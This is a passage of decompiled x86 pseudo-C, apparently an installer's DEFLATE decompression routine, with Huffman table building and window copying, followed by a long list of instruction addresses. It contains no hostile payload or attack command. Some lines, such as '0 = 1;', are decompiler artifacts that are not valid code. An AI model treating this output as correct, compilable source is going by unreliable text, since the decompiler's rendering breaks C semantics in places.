                                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                          											}
                                                          											__eflags = __esi[1];
                                                          											 *(__ebp - 0x20) = __ecx;
                                                          											if(__esi[1] != 0) {
                                                          												L135:
                                                          												__edi =  *(__ebp - 0x2c);
                                                          												do {
                                                          													L136:
                                                          													__eflags = __edi;
                                                          													if(__edi != 0) {
                                                          														goto L152;
                                                          													}
                                                          													L137:
                                                          													__edi = __esi[0x26e8];
                                                          													__eflags = __eax - __edi;
                                                          													if(__eax != __edi) {
                                                          														L143:
                                                          														__esi[0x26ea] = __eax;
                                                          														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          														__eax = __esi[0x26ea];
                                                          														__ecx = __esi[0x26e9];
                                                          														__eflags = __eax - __ecx;
                                                          														 *(__ebp - 0x30) = __eax;
                                                          														if(__eax >= __ecx) {
                                                          															__edi = __esi[0x26e8];
                                                          															__edi = __esi[0x26e8] - __eax;
                                                          															__eflags = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __eax;
                                                          															__edi = __ecx - __eax - 1;
                                                          														}
                                                          														__edx = __esi[0x26e8];
                                                          														__eflags = __eax - __edx;
                                                          														 *(__ebp - 8) = __edx;
                                                          														if(__eax == __edx) {
                                                          															__edx =  &(__esi[0x6e8]);
                                                          															__eflags = __ecx - __edx;
                                                          															if(__ecx != __edx) {
                                                          																__eax = __edx;
                                                          																__eflags = __eax - __ecx;
                                                          																 *(__ebp - 0x30) = __eax;
                                                          																if(__eax >= __ecx) {
                                                          																	__edi =  *(__ebp - 8);
                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                          																	__eflags = __edi;
                                                          																} else {
                                                          																	__ecx = __ecx - __eax;
                                                          																	__edi = __ecx;
                                                          																}
                                                          															}
                                                          														}
                                                          														__eflags = __edi;
                                                          														if(__edi == 0) {
                                                          															goto L183;
                                                          														} else {
                                                          															goto L152;
                                                          														}
                                                          													}
                                                          													L138:
                                                          													__ecx = __esi[0x26e9];
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx == __edx) {
                                                          														goto L143;
                                                          													}
                                                          													L139:
                                                          													__eax = __edx;
                                                          													__eflags = __eax - __ecx;
                                                          													if(__eax >= __ecx) {
                                                          														__edi = __edi - __eax;
                                                          														__eflags = __edi;
                                                          													} else {
                                                          														__ecx = __ecx - __eax;
                                                          														__edi = __ecx;
                                                          													}
                                                          													__eflags = __edi;
                                                          													if(__edi == 0) {
                                                          														goto L143;
                                                          													}
                                                          													L152:
                                                          													__ecx =  *(__ebp - 0x20);
                                                          													 *__eax =  *__ecx;
                                                          													__eax = __eax + 1;
                                                          													__ecx = __ecx + 1;
                                                          													__edi = __edi - 1;
                                                          													__eflags = __ecx - __esi[0x26e8];
                                                          													 *(__ebp - 0x30) = __eax;
                                                          													 *(__ebp - 0x20) = __ecx;
                                                          													 *(__ebp - 0x2c) = __edi;
                                                          													if(__ecx == __esi[0x26e8]) {
                                                          														__ecx =  &(__esi[0x6e8]);
                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                          													}
                                                          													_t357 =  &(__esi[1]);
                                                          													 *_t357 = __esi[1] - 1;
                                                          													__eflags =  *_t357;
                                                          												} while ( *_t357 != 0);
                                                          											}
                                                          											goto L23;
                                                          										case 6:
                                                          											L156:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__edi =  *(__ebp - 0x30);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L172:
                                                          												__cl = __esi[2];
                                                          												 *__edi = __cl;
                                                          												__edi = __edi + 1;
                                                          												__eax = __eax - 1;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												goto L23;
                                                          											}
                                                          											L157:
                                                          											__ecx = __esi[0x26e8];
                                                          											__eflags = __edi - __ecx;
                                                          											if(__edi != __ecx) {
                                                          												L163:
                                                          												__esi[0x26ea] = __edi;
                                                          												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          												__edi = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edi - __ecx;
                                                          												 *(__ebp - 0x30) = __edi;
                                                          												if(__edi >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edi;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edi;
                                                          													__eax = __ecx - __edi - 1;
                                                          												}
                                                          												__edx = __esi[0x26e8];
                                                          												__eflags = __edi - __edx;
                                                          												 *(__ebp - 8) = __edx;
                                                          												if(__edi == __edx) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __ecx - __edx;
                                                          													if(__ecx != __edx) {
                                                          														__edi = __edx;
                                                          														__eflags = __edi - __ecx;
                                                          														 *(__ebp - 0x30) = __edi;
                                                          														if(__edi >= __ecx) {
                                                          															__eax =  *(__ebp - 8);
                                                          															__eax =  *(__ebp - 8) - __edi;
                                                          															__eflags = __eax;
                                                          														} else {
                                                          															__ecx = __ecx - __edi;
                                                          															__eax = __ecx;
                                                          														}
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L172;
                                                          												}
                                                          											}
                                                          											L158:
                                                          											__eax = __esi[0x26e9];
                                                          											__edx =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edx;
                                                          											if(__eax == __edx) {
                                                          												goto L163;
                                                          											}
                                                          											L159:
                                                          											__edi = __edx;
                                                          											__eflags = __edi - __eax;
                                                          											if(__edi >= __eax) {
                                                          												__ecx = __ecx - __edi;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edi;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L172;
                                                          											} else {
                                                          												goto L163;
                                                          											}
                                                          										case 7:
                                                          											L173:
                                                          											__eflags = __ebx - 7;
                                                          											if(__ebx > 7) {
                                                          												__ebx = __ebx - 8;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                          												_t380 = __ebp - 0x38;
                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                          												__eflags =  *_t380;
                                                          											}
                                                          											goto L175;
                                                          										case 8:
                                                          											L4:
                                                          											while(_t425 < 3) {
                                                          												if( *(_t448 - 0x34) == 0) {
                                                          													goto L182;
                                                          												} else {
                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                          													_t425 = _t425 + 8;
                                                          													continue;
                                                          												}
                                                          											}
                                                          											_t425 = _t425 - 3;
                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                          											asm("sbb ecx, ecx");
                                                          											_t408 = _t406 >> 1;
                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                          											if(_t408 == 0) {
                                                          												L24:
                                                          												 *_t446 = 9;
                                                          												_t436 = _t425 & 0x00000007;
                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                          												_t425 = _t425 - _t436;
                                                          												goto L180;
                                                          											}
                                                          											L6:
                                                          											_t411 = _t408 - 1;
                                                          											if(_t411 == 0) {
                                                          												L13:
                                                          												__eflags =  *0x42e3a8;
                                                          												if( *0x42e3a8 != 0) {
                                                          													L22:
                                                          													_t412 =  *0x40a42c; // 0x9
                                                          													_t446[4] = _t412;
                                                          													_t413 =  *0x40a430; // 0x5
                                                          													_t446[4] = _t413;
                                                          													_t414 =  *0x42d224; // 0x0
                                                          													_t446[5] = _t414;
                                                          													_t415 =  *0x42d220; // 0x0
                                                          													_t446[6] = _t415;
                                                          													L23:
                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                          													goto L180;
                                                          												} else {
                                                          													_t26 = _t448 - 8;
                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                          													__eflags =  *_t26;
                                                          													_t416 = 0x42d228;
                                                          													goto L15;
                                                          													L20:
                                                          													 *_t416 = _t438;
                                                          													_t416 = _t416 + 4;
                                                          													__eflags = _t416 - 0x42d6a8;
                                                          													if(_t416 < 0x42d6a8) {
                                                          														L15:
                                                          														__eflags = _t416 - 0x42d464;
                                                          														_t438 = 8;
                                                          														if(_t416 > 0x42d464) {
                                                          															__eflags = _t416 - 0x42d628;
                                                          															if(_t416 >= 0x42d628) {
                                                          																__eflags = _t416 - 0x42d688;
                                                          																if(_t416 < 0x42d688) {
                                                          																	_t438 = 7;
                                                          																}
                                                          															} else {
                                                          																_t438 = 9;
                                                          															}
                                                          														}
                                                          														goto L20;
                                                          													} else {
                                                          														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
                                                          														_push(0x1e);
                                                          														_pop(_t440);
                                                          														_push(5);
                                                          														_pop(_t419);
                                                          														memset(0x42d228, _t419, _t440 << 2);
                                                          														_t450 = _t450 + 0xc;
                                                          														_t442 = 0x42d228 + _t440;
                                                          														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
                                                          														 *0x42e3a8 =  *0x42e3a8 + 1;
                                                          														__eflags =  *0x42e3a8;
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          											}
                                                          											L7:
                                                          											_t423 = _t411 - 1;
                                                          											if(_t423 == 0) {
                                                          												 *_t446 = 0xb;
                                                          												goto L180;
                                                          											}
                                                          											L8:
                                                          											if(_t423 != 1) {
                                                          												goto L180;
                                                          											}
                                                          											goto L9;
                                                          										case 9:
                                                          											while(1) {
                                                          												L27:
                                                          												__eflags = __ebx - 0x20;
                                                          												if(__ebx >= 0x20) {
                                                          													break;
                                                          												}
                                                          												L25:
                                                          												__eflags =  *(__ebp - 0x34);
                                                          												if( *(__ebp - 0x34) == 0) {
                                                          													goto L182;
                                                          												}
                                                          												L26:
                                                          												__eax =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          												__ecx = __ebx;
                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          												__ebx = __ebx + 8;
                                                          												__eflags = __ebx;
                                                          											}
                                                          											L28:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__ebx = 0;
                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                          											 *(__ebp - 0x40) = 0;
                                                          											__eflags = __eax;
                                                          											__esi[1] = __eax;
                                                          											if(__eax == 0) {
                                                          												goto L53;
                                                          											}
                                                          											L29:
                                                          											_push(0xa);
                                                          											_pop(__eax);
                                                          											goto L54;
                                                          										case 0xa:
                                                          											L30:
                                                          											__eflags =  *(__ebp - 0x34);
                                                          											if( *(__ebp - 0x34) == 0) {
                                                          												goto L182;
                                                          											}
                                                          											L31:
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												L48:
                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                          													__eax =  *(__ebp - 0x34);
                                                          												}
                                                          												__ecx = __esi[1];
                                                          												__eflags = __ecx - __eax;
                                                          												__edi = __ecx;
                                                          												if(__ecx >= __eax) {
                                                          													__edi = __eax;
                                                          												}
                                                          												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                          												_t80 =  &(__esi[1]);
                                                          												 *_t80 = __esi[1] - __edi;
                                                          												__eflags =  *_t80;
                                                          												if( *_t80 == 0) {
                                                          													L53:
                                                          													__eax = __esi[0x145];
                                                          													L54:
                                                          													 *__esi = __eax;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          											L32:
                                                          											__ecx = __esi[0x26e8];
                                                          											__edx =  *(__ebp - 0x30);
                                                          											__eflags = __edx - __ecx;
                                                          											if(__edx != __ecx) {
                                                          												L38:
                                                          												__esi[0x26ea] = __edx;
                                                          												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          												__edx = __esi[0x26ea];
                                                          												__ecx = __esi[0x26e9];
                                                          												__eflags = __edx - __ecx;
                                                          												 *(__ebp - 0x30) = __edx;
                                                          												if(__edx >= __ecx) {
                                                          													__eax = __esi[0x26e8];
                                                          													__eax = __esi[0x26e8] - __edx;
                                                          													__eflags = __eax;
                                                          												} else {
                                                          													__ecx = __ecx - __edx;
                                                          													__eax = __ecx - __edx - 1;
                                                          												}
                                                          												__edi = __esi[0x26e8];
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												__eflags = __edx - __edi;
                                                          												if(__edx == __edi) {
                                                          													__edx =  &(__esi[0x6e8]);
                                                          													__eflags = __edx - __ecx;
                                                          													if(__eflags != 0) {
                                                          														 *(__ebp - 0x30) = __edx;
                                                          														if(__eflags >= 0) {
                                                          															__edi = __edi - __edx;
                                                          															__eflags = __edi;
                                                          															__eax = __edi;
                                                          														} else {
                                                          															__ecx = __ecx - __edx;
                                                          															__eax = __ecx;
                                                          														}
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          													}
                                                          												}
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													goto L183;
                                                          												} else {
                                                          													goto L48;
                                                          												}
                                                          											}
                                                          											L33:
                                                          											__eax = __esi[0x26e9];
                                                          											__edi =  &(__esi[0x6e8]);
                                                          											__eflags = __eax - __edi;
                                                          											if(__eax == __edi) {
                                                          												goto L38;
                                                          											}
                                                          											L34:
                                                          											__edx = __edi;
                                                          											__eflags = __edx - __eax;
                                                          											 *(__ebp - 0x30) = __edx;
                                                          											if(__edx >= __eax) {
                                                          												__ecx = __ecx - __edx;
                                                          												__eflags = __ecx;
                                                          												__eax = __ecx;
                                                          											} else {
                                                          												__eax = __eax - __edx;
                                                          												__eax = __eax - 1;
                                                          											}
                                                          											__eflags = __eax;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L48;
                                                          											} else {
                                                          												goto L38;
                                                          											}
                                                          										case 0xb:
                                                          											goto L56;
                                                          										case 0xc:
                                                          											L60:
                                                          											__esi[1] = __esi[1] >> 0xa;
                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                          												goto L68;
                                                          											}
                                                          											goto L61;
                                                          										case 0xd:
                                                          											while(1) {
                                                          												L93:
                                                          												__eax = __esi[1];
                                                          												__ecx = __esi[2];
                                                          												__edx = __eax;
                                                          												__eax = __eax & 0x0000001f;
                                                          												__edx = __edx >> 5;
                                                          												__eax = __edx + __eax + 0x102;
                                                          												__eflags = __esi[2] - __eax;
                                                          												if(__esi[2] >= __eax) {
                                                          													break;
                                                          												}
                                                          												L73:
                                                          												__eax = __esi[0x143];
                                                          												while(1) {
                                                          													L76:
                                                          													__eflags = __ebx - __eax;
                                                          													if(__ebx >= __eax) {
                                                          														break;
                                                          													}
                                                          													L74:
                                                          													__eflags =  *(__ebp - 0x34);
                                                          													if( *(__ebp - 0x34) == 0) {
                                                          														goto L182;
                                                          													}
                                                          													L75:
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          													__ecx = __ebx;
                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          													__ebx = __ebx + 8;
                                                          													__eflags = __ebx;
                                                          												}
                                                          												L77:
                                                          												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                          												__ecx = __esi[0x144];
                                                          												__eax = __esi[0x144] + __eax * 4;
                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                          												__eflags = __eax - 0x10;
                                                          												 *(__ebp - 0x14) = __eax;
                                                          												if(__eax >= 0x10) {
                                                          													L79:
                                                          													__eflags = __eax - 0x12;
                                                          													if(__eax != 0x12) {
                                                          														__eax = __eax + 0xfffffff2;
                                                          														 *(__ebp - 8) = 3;
                                                          													} else {
                                                          														_push(7);
                                                          														 *(__ebp - 8) = 0xb;
                                                          														_pop(__eax);
                                                          													}
                                                          													while(1) {
                                                          														L84:
                                                          														__ecx = __eax + __edx;
                                                          														__eflags = __ebx - __eax + __edx;
                                                          														if(__ebx >= __eax + __edx) {
                                                          															break;
                                                          														}
                                                          														L82:
                                                          														__eflags =  *(__ebp - 0x34);
                                                          														if( *(__ebp - 0x34) == 0) {
                                                          															goto L182;
                                                          														}
                                                          														L83:
                                                          														__ecx =  *(__ebp - 0x38);
                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                          														__ecx = __ebx;
                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                          														__ebx = __ebx + 8;
                                                          														__eflags = __ebx;
                                                          													}
                                                          													L85:
                                                          													__ecx = __edx;
                                                          													__ebx = __ebx - __edx;
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                          													__edx =  *(__ebp - 8);
                                                          													__ebx = __ebx - __eax;
                                                          													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                          													__ecx = __eax;
                                                          													__eax = __esi[1];
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          													__ecx = __esi[2];
                                                          													__eax = __eax >> 5;
                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                          													__eax = __eax & 0x0000001f;
                                                          													__eax = __edi + __eax + 0x102;
                                                          													__edi = __edx + __ecx;
                                                          													__eflags = __edx + __ecx - __eax;
                                                          													if(__edx + __ecx > __eax) {
                                                          														goto L9;
                                                          													}
                                                          													L86:
                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                          														L89:
                                                          														__edi = 0;
                                                          														__eflags = 0;
                                                          														L90:
                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                          														do {
                                                          															L91:
                                                          															 *__eax = __edi;
                                                          															__ecx = __ecx + 1;
                                                          															__eax = __eax + 4;
                                                          															__edx = __edx - 1;
                                                          															__eflags = __edx;
                                                          														} while (__edx != 0);
                                                          														__esi[2] = __ecx;
                                                          														continue;
                                                          													}
                                                          													L87:
                                                          													__eflags = __ecx - 1;
                                                          													if(__ecx < 1) {
                                                          														goto L9;
                                                          													}
                                                          													L88:
                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                          													goto L90;
                                                          												}
                                                          												L78:
                                                          												__ecx = __edx;
                                                          												__ebx = __ebx - __edx;
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                          												__ecx = __esi[2];
                                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                          												__esi[2] = __esi[2] + 1;
                                                          											}
                                                          											L94:
                                                          											__eax = __esi[1];
                                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                          											__edi = __eax;
                                                          											__eax = __eax >> 5;
                                                          											__edi = __edi & 0x0000001f;
                                                          											__ecx = 0x101;
                                                          											__eax = __eax & 0x0000001f;
                                                          											__edi = __edi + 0x101;
                                                          											__eax = __eax + 1;
                                                          											__edx = __ebp - 0xc;
                                                          											 *(__ebp - 0x14) = __eax;
                                                          											 &(__esi[0x148]) = __ebp - 4;
                                                          											 *(__ebp - 4) = 9;
                                                          											__ebp - 0x18 =  &(__esi[3]);
                                                          											 *(__ebp - 0x10) = 6;
                                                          											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                          											__eflags =  *(__ebp - 4);
                                                          											if( *(__ebp - 4) == 0) {
                                                          												__eax = __eax | 0xffffffff;
                                                          												__eflags = __eax;
                                                          											}
                                                          											__eflags = __eax;
                                                          											if(__eax != 0) {
                                                          												goto L9;
                                                          											} else {
                                                          												L97:
                                                          												__ebp - 0xc =  &(__esi[0x148]);
                                                          												__ebp - 0x10 = __ebp - 0x1c;
                                                          												__eax = __esi + 0xc + __edi * 4;
                                                          												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                          												__eflags = __eax;
                                                          												if(__eax != 0) {
                                                          													goto L9;
                                                          												}
                                                          												L98:
                                                          												__eax =  *(__ebp - 0x10);
                                                          												__eflags =  *(__ebp - 0x10);
                                                          												if( *(__ebp - 0x10) != 0) {
                                                          													L100:
                                                          													__cl =  *(__ebp - 4);
                                                          													 *__esi =  *__esi & 0x00000000;
                                                          													__eflags =  *__esi;
                                                          													__esi[4] = __al;
                                                          													__eax =  *(__ebp - 0x18);
                                                          													__esi[5] =  *(__ebp - 0x18);
                                                          													__eax =  *(__ebp - 0x1c);
                                                          													__esi[4] = __cl;
                                                          													__esi[6] =  *(__ebp - 0x1c);
                                                          													goto L101;
                                                          												}
                                                          												L99:
                                                          												__eflags = __edi - 0x101;
                                                          												if(__edi > 0x101) {
                                                          													goto L9;
                                                          												}
                                                          												goto L100;
                                                          											}
                                                          										case 0xe:
                                                          											goto L9;
                                                          										case 0xf:
                                                          											L175:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                                          											__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
                                                          											__ecx = __esi[0x26ea];
                                                          											__edx = __esi[0x26e9];
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x30) = __ecx;
                                                          											if(__ecx >= __edx) {
                                                          												__eax = __esi[0x26e8];
                                                          												__eax = __esi[0x26e8] - __ecx;
                                                          												__eflags = __eax;
                                                          											} else {
                                                          												__edx = __edx - __ecx;
                                                          												__eax = __edx - __ecx - 1;
                                                          											}
                                                          											__eflags = __ecx - __edx;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ecx != __edx) {
                                                          												L183:
                                                          												__edi = 0;
                                                          												goto L10;
                                                          											} else {
                                                          												L179:
                                                          												__eax = __esi[0x145];
                                                          												__eflags = __eax - 8;
                                                          												 *__esi = __eax;
                                                          												if(__eax != 8) {
                                                          													L184:
                                                          													0 = 1;
                                                          													goto L10;
                                                          												}
                                                          												goto L180;
                                                          											}
                                                          									}
                                                          								}
                                                          								L181:
                                                          								goto L9;
                                                          							}
                                                          							L70:
                                                          							if( *__edi == __eax) {
                                                          								goto L72;
                                                          							}
                                                          							L71:
                                                          							__esi[2] = __esi[2] & __eax;
                                                          							 *__esi = 0xd;
                                                          							goto L93;
                                                          						}
                                                          					}
                                                          				}
                                                          				L182:
                                                          				_t443 = 0;
                                                          				_t446[0x147] =  *(_t448 - 0x40);
                                                          				_t446[0x146] = _t425;
                                                          				( *(_t448 + 8))[1] = 0;
                                                          				goto L11;
                                                          			}









                                                          0x00000000
                                                          0x00406a09
                                                          0x00406a0c
                                                          0x00406a0c
                                                          0x00406a13
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a18
                                                          0x00406a21
                                                          0x00406a21
                                                          0x00406a24
                                                          0x00406a32
                                                          0x00406a38
                                                          0x00406a3d
                                                          0x00406a43
                                                          0x00406a49
                                                          0x00406a4f
                                                          0x00406a56
                                                          0x00406a6a
                                                          0x00406a6a
                                                          0x00407039
                                                          0x00407039
                                                          0x00407039
                                                          0x0040703e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406676
                                                          0x00406676
                                                          0x00000000
                                                          0x00406c71
                                                          0x00406c71
                                                          0x00406c75
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00406c7e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c84
                                                          0x00406c84
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406ca9
                                                          0x00406cab
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c89
                                                          0x00406c89
                                                          0x00406c8d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c93
                                                          0x00406c93
                                                          0x00406c96
                                                          0x00406c99
                                                          0x00406c9c
                                                          0x00406c9e
                                                          0x00406ca0
                                                          0x00406ca3
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406ca6
                                                          0x00406cad
                                                          0x00406cad
                                                          0x00406cb5
                                                          0x00406cb8
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc2
                                                          0x00406cc5
                                                          0x00406cc7
                                                          0x00406cca
                                                          0x00406ccc
                                                          0x00406ce0
                                                          0x00406ce0
                                                          0x00406ce3
                                                          0x00406cfd
                                                          0x00406cfd
                                                          0x00406d00
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d06
                                                          0x00406d06
                                                          0x00406d09
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406d0f
                                                          0x00000000
                                                          0x00406d0f
                                                          0x00406ce5
                                                          0x00406ce8
                                                          0x00406cef
                                                          0x00406cf2
                                                          0x00000000
                                                          0x00406cf2
                                                          0x00406cce
                                                          0x00406cd2
                                                          0x00406cd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1a
                                                          0x00406d1a
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d3f
                                                          0x00406d41
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d1f
                                                          0x00406d1f
                                                          0x00406d23
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d34
                                                          0x00406d36
                                                          0x00406d39
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d3c
                                                          0x00406d43
                                                          0x00406d4b
                                                          0x00406d4e
                                                          0x00406d51
                                                          0x00406d53
                                                          0x00406d56
                                                          0x00406d56
                                                          0x00406d58
                                                          0x00406d5c
                                                          0x00406d5f
                                                          0x00406d62
                                                          0x00406d65
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d6b
                                                          0x00406d6b
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d90
                                                          0x00406d92
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d70
                                                          0x00406d70
                                                          0x00406d74
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d7a
                                                          0x00406d7a
                                                          0x00406d7d
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00406d85
                                                          0x00406d87
                                                          0x00406d8a
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d8d
                                                          0x00406d94
                                                          0x00406d94
                                                          0x00406d9c
                                                          0x00406d9f
                                                          0x00406da2
                                                          0x00406da5
                                                          0x00406da9
                                                          0x00406dac
                                                          0x00406dae
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406dce
                                                          0x00406dce
                                                          0x00406dd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dd7
                                                          0x00406dd7
                                                          0x00406dda
                                                          0x00406de1
                                                          0x00000000
                                                          0x00406de1
                                                          0x00406db6
                                                          0x00406db9
                                                          0x00406dc0
                                                          0x00406dc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406de9
                                                          0x00406de9
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e0e
                                                          0x00406e10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dee
                                                          0x00406dee
                                                          0x00406df2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406df8
                                                          0x00406df8
                                                          0x00406dfb
                                                          0x00406dfe
                                                          0x00406e01
                                                          0x00406e03
                                                          0x00406e05
                                                          0x00406e08
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e0b
                                                          0x00406e12
                                                          0x00406e1a
                                                          0x00406e1d
                                                          0x00406e20
                                                          0x00406e22
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e27
                                                          0x00000000
